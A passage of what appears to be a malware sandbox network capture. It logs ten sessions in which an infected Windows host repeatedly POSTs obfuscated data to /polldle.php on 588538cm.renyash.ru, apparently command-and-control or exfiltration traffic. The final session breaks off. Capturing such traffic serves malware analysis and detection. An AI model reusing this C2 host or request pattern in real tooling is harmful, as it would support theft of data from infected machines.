                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                95192.168.2.450103104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:07.727901936 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:08.083079100 CET2504OUTData Raw: 58 5d 51 50 5a 40 5f 5a 54 5d 55 5a 50 5f 59 50 50 53 5a 5a 57 5c 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]QPZ@_ZT]UZP_YPPSZZW\PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:U%1#11!3!7,;<T$#9.B<]!!<?%#X'/\/(
                                                                                Jan 11, 2025 23:34:08.191127062 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:08.360094070 CET802INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9T2%2Fyt62EXFnhwNA%2FVyrN3ytlY63k20C21rMMJv8jexzAiHnZcwdWGELfUpDLfnGyElnVBGCYEW2AivD3Oof2Xk2h3%2FqLN5vgdZSF9N%2F99VYvaoP0aJjNbrTOlip7gBefPPxFZhb"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f58e8748c84-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7990&min_rtt=1970&rtt_var=12779&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=29121&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:34:08.450448036 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                96192.168.2.450104104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:08.568300962 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:08.926882029 CET2504OUTData Raw: 58 5d 54 57 5f 44 5a 5e 54 5d 55 5a 50 54 59 51 50 56 5a 5b 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TW_DZ^T]UZPTYQPVZ[WTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ..@$8(&"='?R4?=;,+4$3-<^#1$(%#X'/\/
                                                                                Jan 11, 2025 23:34:09.020927906 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:09.208379984 CET815INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yzFv6NCuqbIt1I3zvl1Zj%2FEW5PK5TJ%2BdJdC49if%2FFInzIS67%2BSo0SBUEFbW312ke93Poq8RZO1rB%2FTrjMXSIBqwhOBJ%2FfqkspP5L4HDa3Lp0tJRulxojSdzhPtyU8ro1%2FxEtd%2FdS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f5e19a172b9-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3062&min_rtt=2008&rtt_var=2862&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=139753&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                97192.168.2.450105104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:09.335218906 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:09.692363977 CET2504OUTData Raw: 5d 5c 54 56 5a 46 5a 5c 54 5d 55 5a 50 5f 59 51 50 52 5a 5f 57 50 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\TVZFZ\T]UZP_YQPRZ_WPPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 902@2; &1631 /*8[??7W%U--'8^!1,*%#X'/\/(
                                                                                Jan 11, 2025 23:34:09.779334068 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:10.019345045 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RP%2FENzk4qWMExFfGFHACzjG96mKUwlbgA5MniA3Ql6eBJ0bCJ1oE3o662jk4zvFlTa8VjYnOAhYUAPMNiEm7VaZnO41fmq%2F4uLLT8lLzWmJk35PR2O3tgMC4nbvg6lZ%2FHqPgguTw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f62db6f0cc4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2493&min_rtt=1736&rtt_var=2165&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=187347&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                98192.168.2.450106104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:10.147157907 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:10.505021095 CET2504OUTData Raw: 58 5b 51 50 5a 44 5a 51 54 5d 55 5a 50 5e 59 50 50 56 5a 58 57 53 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[QPZDZQT]UZP^YPPVZXWSPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@:"E2^,X120/)#688?Y+Y01 2T:B$\!T'(5#X'/\/,
                                                                                Jan 11, 2025 23:34:10.588177919 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:10.867408037 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kLmD9LpV69wMgWGvhTxQoqwiNNJKHS7MJy4z0fdD2fErBrmY2j6hc9mZ6oqjbNhkU6r46zCAFjI8acvIYeOPUG58r0vHQ2izc%2BX4X9DKFk1kNbZ88apbDnEobl8tkkj6akxqk%2FDu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f67ec1442a7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2776&min_rtt=1751&rtt_var=2706&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=146718&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                99192.168.2.450107104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:10.990305901 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:11.349616051 CET2504OUTData Raw: 58 59 54 51 5a 42 5f 5d 54 5d 55 5a 50 55 59 5d 50 56 5a 53 57 51 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYTQZB_]T]UZPUY]PVZSWQP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9#:%%23?1W#,%Y,;)/%3&-'?"1'+#X'/\/
                                                                                Jan 11, 2025 23:34:11.461920023 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:11.700800896 CET801INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uwddRv0Bi4vA0QkySG0vz9vWCp62igZYkJcCPXw6CRYXuWnUHbPw%2BlOWUqc8jOFevYyBxp%2BBNIPtzijRKOP%2FHzq3er3T4%2F9Mt9F8xNsCnCJYkzTfEXZLQJd0vgWXFCTv300AmXsg"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f6d596c41a3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3360&min_rtt=1661&rtt_var=4021&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=95706&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:34:11.793082952 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                100192.168.2.450108104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:11.915344954 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:12.270737886 CET2504OUTData Raw: 5d 59 51 50 5a 48 5a 58 54 5d 55 5a 50 54 59 5b 50 50 5a 59 57 51 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YQPZHZXT]UZPTY[PPZYWQPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F-06A%(Y26%,*4Z8;<?&.-$36;Z+5#X'/\/
                                                                                Jan 11, 2025 23:34:12.372884035 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                101192.168.2.450109104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:12.463926077 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:12.817418098 CET1620OUTData Raw: 58 51 54 55 5a 45 5f 5a 54 5d 55 5a 50 5a 59 58 50 54 5a 5b 57 5d 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTUZE_ZT]UZPZYXPTZ[W]P\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#9 *E&$X15'.7%Y,+Z<+S%-.B;!2;(%#X'/\/<
                                                                                Jan 11, 2025 23:34:12.917025089 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:13.074856997 CET955INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRGC1AwZcJm%2BDadDERgfE2hpsLYXOdain18THDJ8U%2B59kBM6gNqtlm8756okK6tn97sPBQvIi5nEM%2FxzbCftgzD0%2BilZFIu523Oyjs23YGVvQXZQqp2rydxlU4rxOlDMIDplfdXs"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f767eff7ca6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4929&min_rtt=2015&rtt_var=6584&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=57639&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 54 26 27 3f 01 3d 07 0a 07 2d 5e 3b 5c 2e 0f 0a 10 3e 0f 22 5f 20 29 12 11 25 21 38 1a 3c 2a 04 1d 3f 04 33 12 37 3d 31 0d 26 13 23 46 0c 1d 22 59 2a 2c 3f 08 32 05 38 10 2b 20 32 5d 26 1c 02 07 2a 0a 28 0f 2a 2a 3a 05 21 3c 04 16 3c 1c 21 50 2a 1b 29 03 2f 1f 3b 58 31 2a 2e 51 0f 16 21 1c 21 31 38 15 22 3e 38 07 31 09 33 5f 2b 1d 3f 01 24 2a 38 51 28 20 22 12 2b 32 24 1f 27 5b 33 57 32 3f 26 19 3f 00 20 08 3f 11 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.T&'?=-^;\.>"_ )%!8<*?37=1&#F"Y*,?28+ 2]&*(**:!<<!P*)/;X1*.Q!!18">813_+?$*8Q( "+2$'[3W2?&? ?$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                102192.168.2.450110104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:12.586476088 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:12.942348003 CET2500OUTData Raw: 5d 59 51 52 5a 48 5a 50 54 5d 55 5a 50 5c 59 50 50 53 5a 5c 57 5c 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YQRZHZPT]UZP\YPPSZ\W\P[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-3%+8Z&1=',%7/5^,+)</1 2.$8"2;+#X'/\/
                                                                                Jan 11, 2025 23:34:13.055335045 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:13.289153099 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:13 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NjGFH00e67%2FAzj6b8n%2BGHbmQPDPnarFCGX7UueOwtFz9tTXwI9RVaPyaIGP3wthpy4crlllu2yxI%2FSMtEC9nkiEGXcOEQmLzbNFfk7jHe7QlPDx%2FEeIL7L%2Bin1gA1E8b1bDi9AHN"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f774c328c39-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4050&min_rtt=1995&rtt_var=4858&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=79192&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                103192.168.2.450111104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:13.416649103 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:13.770452976 CET2504OUTData Raw: 58 58 51 52 5a 42 5a 50 54 5d 55 5a 50 59 59 5f 50 57 5a 5d 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXQRZBZPT]UZPYY_PWZ]WWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:052<Z22'/9W Z:-(#? 13.''"?<#X'/\/0
                                                                                Jan 11, 2025 23:34:14.082942009 CET1236OUTData Raw: 58 58 51 52 5a 42 5a 50 54 5d 55 5a 50 59 59 5f 50 57 5a 5d 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXQRZBZPT]UZPYY_PWZ]WWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#:052<Z22'/9W Z:-(#? 13.''"?<#X'/\/0
                                                                                Jan 11, 2025 23:34:14.671246052 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:14.671380997 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:14.671648979 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:14.672661066 CET1268OUTData Raw: 30 11 0a 35 32 55 53 52 02 1c 01 36 38 08 1a 01 28 56 06 1e 31 5d 02 27 03 3d 20 3d 28 3b 3f 26 3a 55 04 0b 34 3f 1b 05 30 31 3f 3b 3c 06 25 07 3b 41 33 5b 31 2b 02 3d 07 2b 23 12 30 0f 3f 20 05 08 5a 1e 39 3b 3f 2a 3b 20 2b 13 22 36 26 3b 04 5c
                                                                                Data Ascii: 052USR68(V1]'= =(;?&:U4?01?;<%;A3[1+=+#0? Z9;?*; +"6&;\07;=,8?1=&?7; *<05/)8Y=T,14^50$*%,"87*/7<</&![+9=(10(-=<:[(^(X0 $853-0=4"6#!0<98-_&-'Y248>9*
                                                                                Jan 11, 2025 23:34:15.039063931 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:14 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hEqlBDcMoR2vEBIZNtm6%2F9eCFWC0FkalfV2KdZR0tQqQ6laIuJwBkBtEVVhoHNiePn5ystUO5FsCGmnkC9TZ74YCDx3nGT6%2BIGP2lqmXosoWFwvqmUfI96gIr%2F%2B5QfvcqF6V1QoC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f7c7b8c8c41-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7829&min_rtt=1950&rtt_var=12490&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=29805&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                104192.168.2.450112104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:15.163779020 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:15.520488977 CET2504OUTData Raw: 58 5a 51 52 5f 46 5a 51 54 5d 55 5a 50 55 59 59 50 57 5a 5e 57 52 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
